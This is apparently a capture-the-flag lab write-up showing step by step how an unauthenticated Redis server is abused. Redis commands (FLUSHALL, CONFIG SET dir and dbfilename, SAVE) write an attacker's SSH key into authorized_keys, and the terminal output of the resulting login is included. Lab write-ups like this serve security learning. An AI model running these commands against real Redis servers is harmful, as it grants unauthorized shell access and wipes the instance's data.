Redis SSH File Write


The target Redis server is configured without authentication, so anyone can connect to the instance. It also grants write access to those anonymous clients, which can be leveraged to write a file onto the host's filesystem.

There are many ways to turn a file write into a foothold; here I will use the SSH key write method.

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ (echo -e "\n\n"; cat ~/.ssh/id_ed25519.pub ; echo -e "\n\n") > spaced_key.txt
 
┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ cat spaced_key.txt 
 
 
 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali
 
 
 

First, I create a file containing my SSH public key with two blank lines before and after it. The RDB dump Redis is about to write wraps the stored value in a binary header and trailer, and the padding keeps those bytes off the line that holds the key, so sshd can still parse that line.

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ redis-cli -h $IP FLUSHALL
OK

Then I flush all keys in the target instance, so the dump will contain nothing but my key.

This is necessary as I kept getting the following error: (error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error.

A MISCONF error means the last RDB save failed, most often because dir points somewhere the redis user cannot write; until a save succeeds, Redis refuses write commands. Note that FLUSHALL destroys every key on the instance, so on a real engagement check the rules of engagement first, or skip it and accept a larger dump file around the key.

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ cat ./spaced_key.txt | redis-cli -h $IP -x SET ssh_key

This stores the padded key as the value of a new key, ssh_key; the -x flag makes redis-cli read the last argument from stdin.

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ redis-cli -h $IP CONFIG SET dir /var/lib/redis/.ssh
OK

Then I change the dir setting to the .ssh directory of the redis account, which is where Redis will write its next dump.

  • This only works if /var/lib/redis/.ssh already exists and is writable by the user running Redis; CONFIG SET dir changes into the directory and returns an error otherwise.
  • On Debian/Ubuntu the redis-server package creates a redis service account with /var/lib/redis as its home directory and runs the daemon as that user, which is why this path is the target.

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ redis-cli -h $IP CONFIG SET dbfilename authorized_keys 
OK

Next, I set the dump filename to authorized_keys. Combined with the dir setting, the next save will write the dump to /var/lib/redis/.ssh/authorized_keys.

┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ redis-cli -h $IP SAVE
OK

SAVE writes the dump synchronously, so /var/lib/redis/.ssh/authorized_keys now exists with my public key inside it, surrounded by RDB binary data that sshd ignores because it is not on the key's line. Provided the sshd configuration on the target allows public key authentication for the redis account, and the account has a usable login shell, I should be able to SSH into the target as redis using my own key.

SSH


┌──(kali㉿kali)-[~/archive/htb/labs/postman]
└─$ ssh redis@$IP -i ~/.ssh/id_ed25519 
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ED25519 key fingerprint is SHA256:eBdalosj8xYLuCyv0MFDgHIabjJ9l3TMv1GYjZdxY9Y.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.160' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
 
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ whoami
redis
redis@Postman:~$ hostname
Postman
redis@Postman:~$ ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.160  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:6363  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:6363  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:63:63  txqueuelen 1000  (Ethernet)
        RX packets 294  bytes 29310 (29.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 127  bytes 14703 (14.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 19  base 0x2000  
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1896  bytes 135160 (135.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1896  bytes 135160 (135.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial foothold established on the target system as the redis account via SSH.